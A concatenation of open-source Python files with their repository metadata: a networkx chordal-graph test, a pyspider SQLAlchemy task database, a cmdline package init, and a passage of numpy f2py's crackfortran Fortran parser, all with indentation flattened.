import networkx as nx
class TestMCS:
@classmethod
def setup_class(cls):
# simple graph
connected_chordal_G = nx.Graph()
connected_chordal_G.add_edges_from([(1, 2), (1, 3), (2, 3), (2, 4),
(3, 4), (3, 5), (3, 6), (4, 5),
(4, 6), (5, 6)])
cls.connected_chordal_G = connected_chordal_G
chordal_G = nx.Graph()
chordal_G.add_edges_from([(1, 2), (1, 3), (2, 3), (2, 4), (3, 4),
(3, 5), (3, 6), (4, 5), (4, 6), (5, 6),
(7, 8)])
chordal_G.add_node(9)
cls.chordal_G = chordal_G
non_chordal_G = nx.Graph()
non_chordal_G.add_edges_from([(1, 2), (1, 3), (2, 4), (2, 5),
(3, 4), (3, 5)])
cls.non_chordal_G = non_chordal_G
def test_is_chordal(self):
assert not nx.is_chordal(self.non_chordal_G)
assert nx.is_chordal(self.chordal_G)
assert nx.is_chordal(self.connected_chordal_G)
assert nx.is_chordal(nx.complete_graph(3))
assert nx.is_chordal(nx.cycle_graph(3))
assert not nx.is_chordal(nx.cycle_graph(5))
def test_induced_nodes(self):
G = nx.generators.classic.path_graph(10)
Induced_nodes = nx.find_induced_nodes(G, 1, 9, 2)
assert Induced_nodes == set([1, 2, 3, 4, 5, 6, 7, 8, 9])
pytest.raises(nx.NetworkXTreewidthBoundExceeded,
nx.find_induced_nodes, G, 1, 9, 1)
Induced_nodes = nx.find_induced_nodes(self.chordal_G, 1, 6)
assert Induced_nodes == set([1, 2, 4, 6])
pytest.raises(nx.NetworkXError,
nx.find_induced_nodes, self.non_chordal_G, 1, 5)
def test_chordal_find_cliques(self):
cliques = set([frozenset([9]), frozenset([7, 8]), frozenset([1, 2, 3]),
frozenset([2, 3, 4]), frozenset([3, 4, 5, 6])])
assert nx.chordal_graph_cliques(self.chordal_G) == cliques
def test_chordal_find_cliques_path(self):
G = nx.path_graph(10)
cliqueset = nx.chordal_graph_cliques(G)
for (u, v) in G.edges():
assert (frozenset([u, v]) in cliqueset
or frozenset([v, u]) in cliqueset)
def test_chordal_find_cliquesCC(self):
cliques = set([frozenset([1, 2, 3]), frozenset([2, 3, 4]),
frozenset([3, 4, 5, 6])])
cgc = nx.chordal_graph_cliques
assert cgc(self.connected_chordal_G) == cliques
def test_complete_to_chordal_graph(self):
fgrg = nx.fast_gnp_random_graph
test_graphs = [nx.barbell_graph(6, 2), nx.cycle_graph(15),
nx.wheel_graph(20), nx.grid_graph([10, 4]),
nx.ladder_graph(15), nx.star_graph(5),
nx.bull_graph(), fgrg(20, 0.3, seed=1)]
for G in test_graphs:
H, a = nx.complete_to_chordal_graph(G)
assert nx.is_chordal(H)
assert len(a) == H.number_of_nodes()
if nx.is_chordal(G):
assert G.number_of_edges() == H.number_of_edges()
assert set(a.values()) == {0}
else:
assert len(set(a.values())) == H.number_of_nodes()
|
sserrot/champion_relationships
|
venv/Lib/site-packages/networkx/algorithms/tests/test_chordal.py
|
Python
|
mit
| 3,351
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<roy@binux.me>
# http://binux.me
# Created on 2014-12-04 22:33:43
import re
import six
import time
import json
import sqlalchemy.exc
from sqlalchemy import (create_engine, MetaData, Table, Column, Index,
Integer, String, Float, Text, func)
from sqlalchemy.engine.url import make_url
from pyspider.libs import utils
from pyspider.database.base.taskdb import TaskDB as BaseTaskDB
from .sqlalchemybase import SplitTableMixin, result2dict
class TaskDB(SplitTableMixin, BaseTaskDB):
__tablename__ = ''
def __init__(self, url):
self.table = Table('__tablename__', MetaData(),
Column('taskid', String(64), primary_key=True, nullable=False),
Column('project', String(64)),
Column('url', String(1024)),
Column('status', Integer),
Column('schedule', Text()),
Column('fetch', Text()),
Column('process', Text()),
Column('track', Text()),
Column('lastcrawltime', Float(32)),
Column('updatetime', Float(32)),
mysql_engine='InnoDB',
mysql_charset='utf8'
)
self.url = make_url(url)
if self.url.database:
database = self.url.database
self.url.database = None
try:
engine = create_engine(self.url, convert_unicode=True, pool_recycle=3600)
conn = engine.connect()
conn.execute("commit")
conn.execute("CREATE DATABASE %s" % database)
except sqlalchemy.exc.SQLAlchemyError:
pass
self.url.database = database
self.engine = create_engine(url, convert_unicode=True, pool_recycle=3600)
self._list_project()
def _create_project(self, project):
assert re.match(r'^\w+$', project) is not None
if project in self.projects:
return
self.table.name = self._tablename(project)
Index('status_%s_index' % self.table.name, self.table.c.status)
self.table.create(self.engine, checkfirst=True)
self.table.indexes.clear()
@staticmethod
def _parse(data):
for key, value in list(six.iteritems(data)):
if isinstance(value, six.binary_type):
data[key] = utils.text(value)
for each in ('schedule', 'fetch', 'process', 'track'):
if each in data:
if data[each]:
data[each] = json.loads(data[each])
else:
data[each] = {}
return data
@staticmethod
def _stringify(data):
for each in ('schedule', 'fetch', 'process', 'track'):
if each in data:
if data[each]:
data[each] = json.dumps(data[each])
else:
data[each] = json.dumps({})
return data
def load_tasks(self, status, project=None, fields=None):
if project and project not in self.projects:
return
if project:
projects = [project, ]
else:
projects = self.projects
columns = [getattr(self.table.c, f, f) for f in fields] if fields else self.table.c
for project in projects:
self.table.name = self._tablename(project)
for task in self.engine.execute(self.table.select()
.with_only_columns(columns)
.where(self.table.c.status == status)):
yield self._parse(result2dict(columns, task))
def get_task(self, project, taskid, fields=None):
if project not in self.projects:
self._list_project()
if project not in self.projects:
return None
self.table.name = self._tablename(project)
columns = [getattr(self.table.c, f, f) for f in fields] if fields else self.table.c
for each in self.engine.execute(self.table.select()
.with_only_columns(columns)
.limit(1)
.where(self.table.c.taskid == taskid)):
return self._parse(result2dict(columns, each))
def status_count(self, project):
result = dict()
if project not in self.projects:
self._list_project()
if project not in self.projects:
return result
self.table.name = self._tablename(project)
for status, count in self.engine.execute(
self.table.select()
.with_only_columns((self.table.c.status, func.count(1)))
.group_by(self.table.c.status)):
result[status] = count
return result
def insert(self, project, taskid, obj={}):
if project not in self.projects:
self._list_project()
if project not in self.projects:
self._create_project(project)
self._list_project()
obj = dict(obj)
obj['taskid'] = taskid
obj['project'] = project
obj['updatetime'] = time.time()
self.table.name = self._tablename(project)
return self.engine.execute(self.table.insert()
.values(**self._stringify(obj)))
def update(self, project, taskid, obj={}, **kwargs):
if project not in self.projects:
self._list_project()
if project not in self.projects:
raise LookupError
self.table.name = self._tablename(project)
obj = dict(obj)
obj.update(kwargs)
obj['updatetime'] = time.time()
return self.engine.execute(self.table.update()
.where(self.table.c.taskid == taskid)
.values(**self._stringify(obj)))
|
wangjun/pyspider
|
pyspider/database/sqlalchemy/taskdb.py
|
Python
|
apache-2.0
| 6,160
|
from __future__ import absolute_import
# setup logging as close to launching the command as possible
from .logconfig import setup_logging
from .command import BaseCommand
from .settings import SettingsParser
settings = SettingsParser.settings
__all__ = ['SettingsParser', 'settings', 'setup_logging']
|
rca/cmdline
|
src/cmdline/__init__.py
|
Python
|
apache-2.0
| 305
|
#!/usr/bin/env python
"""
crackfortran --- read fortran (77,90) code and extract declaration information.
Copyright 1999-2004 Pearu Peterson all rights reserved,
Pearu Peterson <pearu@ioc.ee>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/09/27 07:13:49 $
Pearu Peterson
Usage of crackfortran:
======================
Command line keys: -quiet,-verbose,-fix,-f77,-f90,-show,-h <pyffilename>
-m <module name for f77 routines>,--ignore-contains
Functions: crackfortran, crack2fortran
The following Fortran statements/constructions are supported
(or will be if needed):
block data,byte,call,character,common,complex,contains,data,
dimension,double complex,double precision,end,external,function,
implicit,integer,intent,interface,intrinsic,
logical,module,optional,parameter,private,public,
program,real,(sequence?),subroutine,type,use,virtual,
include,pythonmodule
Note: 'virtual' is mapped to 'dimension'.
Note: 'implicit integer (z) static (z)' is 'implicit static (z)' (this is minor bug).
Note: code after 'contains' will be ignored until its scope ends.
Note: 'common' statement is extended: dimensions are moved to variable definitions
Note: f2py directive: <commentchar>f2py<line> is read as <line>
Note: pythonmodule is introduced to represent Python module
Usage:
`postlist=crackfortran(files,funcs)`
`postlist` contains declaration information read from the list of files `files`.
`crack2fortran(postlist)` returns a fortran code to be saved to pyf-file
`postlist` has the following structure:
*** it is a list of dictionaries containing `blocks':
B = {'block','body','vars','parent_block'[,'name','prefix','args','result',
'implicit','externals','interfaced','common','sortvars',
'commonvars','note']}
B['block'] = 'interface' | 'function' | 'subroutine' | 'module' |
'program' | 'block data' | 'type' | 'pythonmodule'
B['body'] --- list containing `subblocks' with the same structure as `blocks'
B['parent_block'] --- dictionary of a parent block:
C['body'][<index>]['parent_block'] is C
B['vars'] --- dictionary of variable definitions
B['sortvars'] --- dictionary of variable definitions sorted by dependence (independent first)
B['name'] --- name of the block (not if B['block']=='interface')
B['prefix'] --- prefix string (only if B['block']=='function')
B['args'] --- list of argument names if B['block']== 'function' | 'subroutine'
B['result'] --- name of the return value (only if B['block']=='function')
B['implicit'] --- dictionary {'a':<variable definition>,'b':...} | None
B['externals'] --- list of variables being external
B['interfaced'] --- list of variables being external and defined
B['common'] --- dictionary of common blocks (list of objects)
B['commonvars'] --- list of variables used in common blocks (dimensions are moved to variable definitions)
B['from'] --- string showing the 'parents' of the current block
B['use'] --- dictionary of modules used in current block:
{<modulename>:{['only':<0|1>],['map':{<local_name1>:<use_name1>,...}]}}
B['note'] --- list of LaTeX comments on the block
B['f2pyenhancements'] --- optional dictionary
{'threadsafe':'','fortranname':<name>,
'callstatement':<C-expr>|<multi-line block>,
'callprotoargument':<C-expr-list>,
'usercode':<multi-line block>|<list of multi-line blocks>,
'pymethoddef:<multi-line block>'
}
B['entry'] --- dictionary {entryname:argslist,..}
B['varnames'] --- list of variable names given in the order of reading the
Fortran code, useful for derived types.
B['saved_interface'] --- a string of scanned routine signature, defines explicit interface
*** Variable definition is a dictionary
D = B['vars'][<variable name>] =
{'typespec'[,'attrspec','kindselector','charselector','=','typename']}
D['typespec'] = 'byte' | 'character' | 'complex' | 'double complex' |
'double precision' | 'integer' | 'logical' | 'real' | 'type'
D['attrspec'] --- list of attributes (e.g. 'dimension(<arrayspec>)',
'external','intent(in|out|inout|hide|c|callback|cache|aligned4|aligned8|aligned16)',
'optional','required', etc)
K = D['kindselector'] = {['*','kind']} (only if D['typespec'] =
'complex' | 'integer' | 'logical' | 'real' )
C = D['charselector'] = {['*','len','kind']}
(only if D['typespec']=='character')
D['='] --- initialization expression string
D['typename'] --- name of the type if D['typespec']=='type'
D['dimension'] --- list of dimension bounds
D['intent'] --- list of intent specifications
D['depend'] --- list of variable names on which current variable depends on
D['check'] --- list of C-expressions; if C-expr returns zero, exception is raised
D['note'] --- list of LaTeX comments on the variable
*** Meaning of kind/char selectors (few examples):
D['typespec>']*K['*']
D['typespec'](kind=K['kind'])
character*C['*']
character(len=C['len'],kind=C['kind'])
(see also fortran type declaration statement formats below)
Fortran 90 type declaration statement format (F77 is subset of F90)
====================================================================
(Main source: IBM XL Fortran 5.1 Language Reference Manual)
type declaration = <typespec> [[<attrspec>]::] <entitydecl>
<typespec> = byte |
character[<charselector>] |
complex[<kindselector>] |
double complex |
double precision |
integer[<kindselector>] |
logical[<kindselector>] |
real[<kindselector>] |
type(<typename>)
<charselector> = * <charlen> |
([len=]<len>[,[kind=]<kind>]) |
(kind=<kind>[,len=<len>])
<kindselector> = * <intlen> |
([kind=]<kind>)
<attrspec> = comma separated list of attributes.
Only the following attributes are used in
building up the interface:
external
(parameter --- affects '=' key)
optional
intent
Other attributes are ignored.
<intentspec> = in | out | inout
<arrayspec> = comma separated list of dimension bounds.
<entitydecl> = <name> [[*<charlen>][(<arrayspec>)] | [(<arrayspec>)]*<charlen>]
[/<init_expr>/ | =<init_expr>] [,<entitydecl>]
In addition, the following attributes are used: check,depend,note
TODO:
* Apply 'parameter' attribute (e.g. 'integer parameter :: i=2' 'real x(i)'
-> 'real x(2)')
The above may be solved by creating appropriate preprocessor program, for example.
"""
from __future__ import division, absolute_import, print_function
import sys
import string
import fileinput
import re
import os
import copy
import platform
from . import __version__
# The eviroment provided by auxfuncs.py is needed for some calls to eval.
# As the needed functions cannot be determined by static inspection of the
# code, it is safest to use import * pending a major refactoring of f2py.
from .auxfuncs import *
f2py_version = __version__.version
# Global flags:
strictf77 = 1 # Ignore `!' comments unless line[0]=='!'
sourcecodeform = 'fix' # 'fix','free'
quiet = 0 # Be verbose if 0 (Obsolete: not used any more)
verbose = 1 # Be quiet if 0, extra verbose if > 1.
tabchar = 4 * ' '
pyffilename = ''
f77modulename = ''
skipemptyends = 0 # for old F77 programs without 'program' statement
ignorecontains = 1
dolowercase = 1
debug = []
# Global variables
beginpattern = ''
currentfilename = ''
expectbegin = 1
f90modulevars = {}
filepositiontext = ''
gotnextfile = 1
groupcache = None
groupcounter = 0
grouplist = {groupcounter: []}
groupname = ''
include_paths = []
neededmodule = -1
onlyfuncs = []
previous_context = None
skipblocksuntil = -1
skipfuncs = []
skipfunctions = []
usermodules = []
def reset_global_f2py_vars():
global groupcounter, grouplist, neededmodule, expectbegin
global skipblocksuntil, usermodules, f90modulevars, gotnextfile
global filepositiontext, currentfilename, skipfunctions, skipfuncs
global onlyfuncs, include_paths, previous_context
global strictf77, sourcecodeform, quiet, verbose, tabchar, pyffilename
global f77modulename, skipemptyends, ignorecontains, dolowercase, debug
# flags
strictf77 = 1
sourcecodeform = 'fix'
quiet = 0
verbose = 1
tabchar = 4 * ' '
pyffilename = ''
f77modulename = ''
skipemptyends = 0
ignorecontains = 1
dolowercase = 1
debug = []
# variables
groupcounter = 0
grouplist = {groupcounter: []}
neededmodule = -1
expectbegin = 1
skipblocksuntil = -1
usermodules = []
f90modulevars = {}
gotnextfile = 1
filepositiontext = ''
currentfilename = ''
skipfunctions = []
skipfuncs = []
onlyfuncs = []
include_paths = []
previous_context = None
def outmess(line, flag=1):
global filepositiontext
if not verbose:
return
if not quiet:
if flag:
sys.stdout.write(filepositiontext)
sys.stdout.write(line)
re._MAXCACHE = 50
defaultimplicitrules = {}
for c in "abcdefghopqrstuvwxyz$_":
defaultimplicitrules[c] = {'typespec': 'real'}
for c in "ijklmn":
defaultimplicitrules[c] = {'typespec': 'integer'}
del c
badnames = {}
invbadnames = {}
for n in ['int', 'double', 'float', 'char', 'short', 'long', 'void', 'case', 'while',
'return', 'signed', 'unsigned', 'if', 'for', 'typedef', 'sizeof', 'union',
'struct', 'static', 'register', 'new', 'break', 'do', 'goto', 'switch',
'continue', 'else', 'inline', 'extern', 'delete', 'const', 'auto',
'len', 'rank', 'shape', 'index', 'slen', 'size', '_i',
'max', 'min',
'flen', 'fshape',
'string', 'complex_double', 'float_double', 'stdin', 'stderr', 'stdout',
'type', 'default']:
badnames[n] = n + '_bn'
invbadnames[n + '_bn'] = n
def rmbadname1(name):
if name in badnames:
errmess('rmbadname1: Replacing "%s" with "%s".\n' %
(name, badnames[name]))
return badnames[name]
return name
def rmbadname(names):
return [rmbadname1(_m) for _m in names]
def undo_rmbadname1(name):
if name in invbadnames:
errmess('undo_rmbadname1: Replacing "%s" with "%s".\n'
% (name, invbadnames[name]))
return invbadnames[name]
return name
def undo_rmbadname(names):
return [undo_rmbadname1(_m) for _m in names]
def getextension(name):
i = name.rfind('.')
if i == -1:
return ''
if '\\' in name[i:]:
return ''
if '/' in name[i:]:
return ''
return name[i + 1:]
is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z', re.I).match
_has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-', re.I).search
_has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-', re.I).search
_has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-', re.I).search
_free_f90_start = re.compile(r'[^c*]\s*[^\s\d\t]', re.I).match
def is_free_format(file):
"""Check if file is in free format Fortran."""
# f90 allows both fixed and free format, assuming fixed unless
# signs of free format are detected.
result = 0
f = open(file, 'r')
line = f.readline()
n = 15 # the number of non-comment lines to scan for hints
if _has_f_header(line):
n = 0
elif _has_f90_header(line):
n = 0
result = 1
while n > 0 and line:
if line[0] != '!' and line.strip():
n -= 1
if (line[0] != '\t' and _free_f90_start(line[:5])) or line[-2:-1] == '&':
result = 1
break
line = f.readline()
f.close()
return result
# Read fortran (77,90) code
def readfortrancode(ffile, dowithline=show, istop=1):
"""
Read fortran codes from files and
1) Get rid of comments, line continuations, and empty lines; lower cases.
2) Call dowithline(line) on every line.
3) Recursively call itself when statement \"include '<filename>'\" is met.
"""
global gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77
global beginpattern, quiet, verbose, dolowercase, include_paths
if not istop:
saveglobals = gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\
beginpattern, quiet, verbose, dolowercase
if ffile == []:
return
localdolowercase = dolowercase
cont = 0
finalline = ''
ll = ''
commentline = re.compile(
r'(?P<line>([^"]*["][^"]*["][^"!]*|[^\']*\'[^\']*\'[^\'!]*|[^!\'"]*))!{1}(?P<rest>.*)')
includeline = re.compile(
r'\s*include\s*(\'|")(?P<name>[^\'"]*)(\'|")', re.I)
cont1 = re.compile(r'(?P<line>.*)&\s*\Z')
cont2 = re.compile(r'(\s*&|)(?P<line>.*)')
mline_mark = re.compile(r".*?'''")
if istop:
dowithline('', -1)
ll, l1 = '', ''
spacedigits = [' '] + [str(_m) for _m in range(10)]
filepositiontext = ''
fin = fileinput.FileInput(ffile)
while True:
l = fin.readline()
if not l:
break
if fin.isfirstline():
filepositiontext = ''
currentfilename = fin.filename()
gotnextfile = 1
l1 = l
strictf77 = 0
sourcecodeform = 'fix'
ext = os.path.splitext(currentfilename)[1]
if is_f_file(currentfilename) and \
not (_has_f90_header(l) or _has_fix_header(l)):
strictf77 = 1
elif is_free_format(currentfilename) and not _has_fix_header(l):
sourcecodeform = 'free'
if strictf77:
beginpattern = beginpattern77
else:
beginpattern = beginpattern90
outmess('\tReading file %s (format:%s%s)\n'
% (repr(currentfilename), sourcecodeform,
strictf77 and ',strict' or ''))
l = l.expandtabs().replace('\xa0', ' ')
# Get rid of newline characters
while not l == '':
if l[-1] not in "\n\r\f":
break
l = l[:-1]
if not strictf77:
r = commentline.match(l)
if r:
l = r.group('line') + ' ' # Strip comments starting with `!'
rl = r.group('rest')
if rl[:4].lower() == 'f2py': # f2py directive
l = l + 4 * ' '
r = commentline.match(rl[4:])
if r:
l = l + r.group('line')
else:
l = l + rl[4:]
if l.strip() == '': # Skip empty line
cont = 0
continue
if sourcecodeform == 'fix':
if l[0] in ['*', 'c', '!', 'C', '#']:
if l[1:5].lower() == 'f2py': # f2py directive
l = ' ' + l[5:]
else: # Skip comment line
cont = 0
continue
elif strictf77:
if len(l) > 72:
l = l[:72]
if not (l[0] in spacedigits):
raise Exception('readfortrancode: Found non-(space,digit) char '
'in the first column.\n\tAre you sure that '
'this code is in fix form?\n\tline=%s' % repr(l))
if (not cont or strictf77) and (len(l) > 5 and not l[5] == ' '):
# Continuation of a previous line
ll = ll + l[6:]
finalline = ''
origfinalline = ''
else:
if not strictf77:
# F90 continuation
r = cont1.match(l)
if r:
l = r.group('line') # Continuation follows ..
if cont:
ll = ll + cont2.match(l).group('line')
finalline = ''
origfinalline = ''
else:
# clean up line beginning from possible digits.
l = ' ' + l[5:]
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
cont = (r is not None)
else:
# clean up line beginning from possible digits.
l = ' ' + l[5:]
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
elif sourcecodeform == 'free':
if not cont and ext == '.pyf' and mline_mark.match(l):
l = l + '\n'
while True:
lc = fin.readline()
if not lc:
errmess(
'Unexpected end of file when reading multiline\n')
break
l = l + lc
if mline_mark.match(lc):
break
l = l.rstrip()
r = cont1.match(l)
if r:
l = r.group('line') # Continuation follows ..
if cont:
ll = ll + cont2.match(l).group('line')
finalline = ''
origfinalline = ''
else:
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
cont = (r is not None)
else:
raise ValueError(
"Flag sourcecodeform must be either 'fix' or 'free': %s" % repr(sourcecodeform))
filepositiontext = 'Line #%d in %s:"%s"\n\t' % (
fin.filelineno() - 1, currentfilename, l1)
m = includeline.match(origfinalline)
if m:
fn = m.group('name')
if os.path.isfile(fn):
readfortrancode(fn, dowithline=dowithline, istop=0)
else:
include_dirs = [
os.path.dirname(currentfilename)] + include_paths
foundfile = 0
for inc_dir in include_dirs:
fn1 = os.path.join(inc_dir, fn)
if os.path.isfile(fn1):
foundfile = 1
readfortrancode(fn1, dowithline=dowithline, istop=0)
break
if not foundfile:
outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n' % (
repr(fn), os.pathsep.join(include_dirs)))
else:
dowithline(finalline)
l1 = ll
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
filepositiontext = 'Line #%d in %s:"%s"\n\t' % (
fin.filelineno() - 1, currentfilename, l1)
m = includeline.match(origfinalline)
if m:
fn = m.group('name')
if os.path.isfile(fn):
readfortrancode(fn, dowithline=dowithline, istop=0)
else:
include_dirs = [os.path.dirname(currentfilename)] + include_paths
foundfile = 0
for inc_dir in include_dirs:
fn1 = os.path.join(inc_dir, fn)
if os.path.isfile(fn1):
foundfile = 1
readfortrancode(fn1, dowithline=dowithline, istop=0)
break
if not foundfile:
outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n' % (
repr(fn), os.pathsep.join(include_dirs)))
else:
dowithline(finalline)
filepositiontext = ''
fin.close()
if istop:
dowithline('', 1)
else:
gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\
beginpattern, quiet, verbose, dolowercase = saveglobals
# Crack line
beforethisafter = r'\s*(?P<before>%s(?=\s*(\b(%s)\b)))' + \
r'\s*(?P<this>(\b(%s)\b))' + \
r'\s*(?P<after>%s)\s*\Z'
##
fortrantypes = 'character|logical|integer|real|complex|double\s*(precision\s*(complex|)|complex)|type(?=\s*\([\w\s,=(*)]*\))|byte'
typespattern = re.compile(
beforethisafter % ('', fortrantypes, fortrantypes, '.*'), re.I), 'type'
typespattern4implicit = re.compile(beforethisafter % (
'', fortrantypes + '|static|automatic|undefined', fortrantypes + '|static|automatic|undefined', '.*'), re.I)
#
functionpattern = re.compile(beforethisafter % (
'([a-z]+[\w\s(=*+-/)]*?|)', 'function', 'function', '.*'), re.I), 'begin'
subroutinepattern = re.compile(beforethisafter % (
'[a-z\s]*?', 'subroutine', 'subroutine', '.*'), re.I), 'begin'
# modulepattern=re.compile(beforethisafter%('[a-z\s]*?','module','module','.*'),re.I),'begin'
#
groupbegins77 = r'program|block\s*data'
beginpattern77 = re.compile(
beforethisafter % ('', groupbegins77, groupbegins77, '.*'), re.I), 'begin'
groupbegins90 = groupbegins77 + \
r'|module(?!\s*procedure)|python\s*module|interface|type(?!\s*\()'
beginpattern90 = re.compile(
beforethisafter % ('', groupbegins90, groupbegins90, '.*'), re.I), 'begin'
groupends = r'end|endprogram|endblockdata|endmodule|endpythonmodule|endinterface'
endpattern = re.compile(
beforethisafter % ('', groupends, groupends, '[\w\s]*'), re.I), 'end'
# endifs='end\s*(if|do|where|select|while|forall)'
endifs = '(end\s*(if|do|where|select|while|forall))|(module\s*procedure)'
endifpattern = re.compile(
beforethisafter % ('[\w]*?', endifs, endifs, '[\w\s]*'), re.I), 'endif'
#
implicitpattern = re.compile(
beforethisafter % ('', 'implicit', 'implicit', '.*'), re.I), 'implicit'
dimensionpattern = re.compile(beforethisafter % (
'', 'dimension|virtual', 'dimension|virtual', '.*'), re.I), 'dimension'
externalpattern = re.compile(
beforethisafter % ('', 'external', 'external', '.*'), re.I), 'external'
optionalpattern = re.compile(
beforethisafter % ('', 'optional', 'optional', '.*'), re.I), 'optional'
requiredpattern = re.compile(
beforethisafter % ('', 'required', 'required', '.*'), re.I), 'required'
publicpattern = re.compile(
beforethisafter % ('', 'public', 'public', '.*'), re.I), 'public'
privatepattern = re.compile(
beforethisafter % ('', 'private', 'private', '.*'), re.I), 'private'
intrisicpattern = re.compile(
beforethisafter % ('', 'intrisic', 'intrisic', '.*'), re.I), 'intrisic'
intentpattern = re.compile(beforethisafter % (
'', 'intent|depend|note|check', 'intent|depend|note|check', '\s*\(.*?\).*'), re.I), 'intent'
parameterpattern = re.compile(
beforethisafter % ('', 'parameter', 'parameter', '\s*\(.*'), re.I), 'parameter'
datapattern = re.compile(
beforethisafter % ('', 'data', 'data', '.*'), re.I), 'data'
callpattern = re.compile(
beforethisafter % ('', 'call', 'call', '.*'), re.I), 'call'
entrypattern = re.compile(
beforethisafter % ('', 'entry', 'entry', '.*'), re.I), 'entry'
callfunpattern = re.compile(
beforethisafter % ('', 'callfun', 'callfun', '.*'), re.I), 'callfun'
commonpattern = re.compile(
beforethisafter % ('', 'common', 'common', '.*'), re.I), 'common'
usepattern = re.compile(
beforethisafter % ('', 'use', 'use', '.*'), re.I), 'use'
containspattern = re.compile(
beforethisafter % ('', 'contains', 'contains', ''), re.I), 'contains'
formatpattern = re.compile(
beforethisafter % ('', 'format', 'format', '.*'), re.I), 'format'
# Non-fortran and f2py-specific statements
f2pyenhancementspattern = re.compile(beforethisafter % ('', 'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef',
'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef', '.*'), re.I | re.S), 'f2pyenhancements'
multilinepattern = re.compile(
r"\s*(?P<before>''')(?P<this>.*?)(?P<after>''')\s*\Z", re.S), 'multiline'
##
def _simplifyargs(argsline):
a = []
for n in markoutercomma(argsline).split('@,@'):
for r in '(),':
n = n.replace(r, '_')
a.append(n)
return ','.join(a)
crackline_re_1 = re.compile(r'\s*(?P<result>\b[a-z]+[\w]*\b)\s*[=].*', re.I)
def crackline(line, reset=0):
"""
reset=-1 --- initialize
reset=0 --- crack the line
reset=1 --- final check if mismatch of blocks occurred
Cracked data is saved in grouplist[0].
"""
global beginpattern, groupcounter, groupname, groupcache, grouplist
global filepositiontext, currentfilename, neededmodule, expectbegin
global skipblocksuntil, skipemptyends, previous_context, gotnextfile
if ';' in line and not (f2pyenhancementspattern[0].match(line) or
multilinepattern[0].match(line)):
for l in line.split(';'):
# XXX: non-zero reset values need testing
assert reset == 0, repr(reset)
crackline(l, reset)
return
if reset < 0:
groupcounter = 0
groupname = {groupcounter: ''}
groupcache = {groupcounter: {}}
grouplist = {groupcounter: []}
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['block'] = ''
groupcache[groupcounter]['name'] = ''
neededmodule = -1
skipblocksuntil = -1
return
if reset > 0:
fl = 0
if f77modulename and neededmodule == groupcounter:
fl = 2
while groupcounter > fl:
outmess('crackline: groupcounter=%s groupname=%s\n' %
(repr(groupcounter), repr(groupname)))
outmess(
'crackline: Mismatch of blocks encountered. Trying to fix it by assuming "end" statement.\n')
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1
if f77modulename and neededmodule == groupcounter:
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end interface
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end module
neededmodule = -1
return
if line == '':
return
flag = 0
for pat in [dimensionpattern, externalpattern, intentpattern, optionalpattern,
requiredpattern,
parameterpattern, datapattern, publicpattern, privatepattern,
intrisicpattern,
endifpattern, endpattern,
formatpattern,
beginpattern, functionpattern, subroutinepattern,
implicitpattern, typespattern, commonpattern,
callpattern, usepattern, containspattern,
entrypattern,
f2pyenhancementspattern,
multilinepattern
]:
m = pat[0].match(line)
if m:
break
flag = flag + 1
if not m:
re_1 = crackline_re_1
if 0 <= skipblocksuntil <= groupcounter:
return
if 'externals' in groupcache[groupcounter]:
for name in groupcache[groupcounter]['externals']:
if name in invbadnames:
name = invbadnames[name]
if 'interfaced' in groupcache[groupcounter] and name in groupcache[groupcounter]['interfaced']:
continue
m1 = re.match(
r'(?P<before>[^"]*)\b%s\b\s*@\(@(?P<args>[^@]*)@\)@.*\Z' % name, markouterparen(line), re.I)
if m1:
m2 = re_1.match(m1.group('before'))
a = _simplifyargs(m1.group('args'))
if m2:
line = 'callfun %s(%s) result (%s)' % (
name, a, m2.group('result'))
else:
line = 'callfun %s(%s)' % (name, a)
m = callfunpattern[0].match(line)
if not m:
outmess(
'crackline: could not resolve function call for line=%s.\n' % repr(line))
return
analyzeline(m, 'callfun', line)
return
if verbose > 1 or (verbose == 1 and currentfilename.lower().endswith('.pyf')):
previous_context = None
outmess('crackline:%d: No pattern for line\n' % (groupcounter))
return
elif pat[1] == 'end':
if 0 <= skipblocksuntil < groupcounter:
groupcounter = groupcounter - 1
if skipblocksuntil <= groupcounter:
return
if groupcounter <= 0:
raise Exception('crackline: groupcounter(=%s) is nonpositive. '
'Check the blocks.'
% (groupcounter))
m1 = beginpattern[0].match((line))
if (m1) and (not m1.group('this') == groupname[groupcounter]):
raise Exception('crackline: End group %s does not match with '
'previous Begin group %s\n\t%s' %
(repr(m1.group('this')), repr(groupname[groupcounter]),
filepositiontext)
)
if skipblocksuntil == groupcounter:
skipblocksuntil = -1
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1
if not skipemptyends:
expectbegin = 1
elif pat[1] == 'begin':
if 0 <= skipblocksuntil <= groupcounter:
